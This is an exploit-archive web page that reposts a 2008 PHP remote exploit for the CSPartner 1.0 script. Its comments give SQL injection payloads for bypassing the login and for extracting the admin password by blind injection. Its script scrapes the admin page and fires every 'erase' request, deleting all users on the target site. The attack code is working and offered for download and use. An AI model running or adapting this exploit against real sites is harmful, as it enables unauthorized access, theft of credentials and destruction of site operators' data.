Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : ExploitAlert

  Topic : CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
  ExploitAlert : 5001
  Milw0rm ID : 6814
  Credit : StAkeR
  Date : 28.10.2008

  Download

  Exploit Code :  

<?php

/*

CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
----------------------------------------------------------------
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/cspartne-01.zip
----------------------------------------------------------------

File gestion.php

5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){
6. $sql = "SELECT * FROM $tblPartner where
pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'";
7. $resultat = mysql_db_query($mydbPartner, $sql);

Blind SQL Injection or Login ByPass for you :P

Examples: ($_POST['pseudo'] and $_POST['passe'])

-1 ' or '1=1
-2 ' or ascii(substring((select password from CSPartner where
id=1),1,1))=[97]/*
-3 and other :D



*/


error_reporting(0);

$host = $argv[1] or die("Usage: php [exploit.php]
[http://localhost/cms]\n");

if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.ph
p'),$out))
{
for($i=0;$i<=count($out);$i++)
{
file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]);
}
echo "[-] All Users Deleted\n";
}
else
{
echo "[-] Exploit Failed!\n";
}



Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.